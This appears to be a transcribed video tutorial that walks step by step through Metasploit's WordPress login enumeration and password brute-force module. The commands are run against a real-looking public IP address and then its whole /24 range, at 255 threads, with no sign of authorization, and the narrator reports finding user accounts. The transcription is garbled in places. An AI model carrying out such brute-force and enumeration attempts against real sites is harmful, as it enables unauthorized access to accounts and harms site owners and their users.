Welcome. In this video, we're going to learn WordPress login enum, which is auxiliary module in Metasploit. The WordPress login enum auxiliary module will brute force a WordPress installation and first determine valid username and then perform a password guessing attack. WordPress authentication brute force and user enumeration utility. Let's open up terminal and type msf console. Load WordPress login enum into the WordPress. Type use auxiliary scanner http WordPress _login _enum. Type info. Here you can see that module information, blank _passwords, try blank passwords for all users, brute force, perform brute force authentication, brute force _speed, how fast to brute force from 0 to 5 and so on. We configure the module first by pointing it to the path of wp-login.php on the target server. We then set our username and password file, set the rhost value and let it run. Type rhost 107.180.54.186. Type set threads 255. Here I created username and password text file. Type set user _file root /desktop /usernames.txt. Type set pass _file root /desktop /password.txt. Let's execute it. Type run. Here you can see that 107.180.54.186 does not seem to be WordPress site. Let's try it with 107.180.54.186 24. Here you can see that we found users with ID of anonymous random site. So that's it in this video on WordPress login enum auxiliary module in Metasploit. Thank you for watching this video.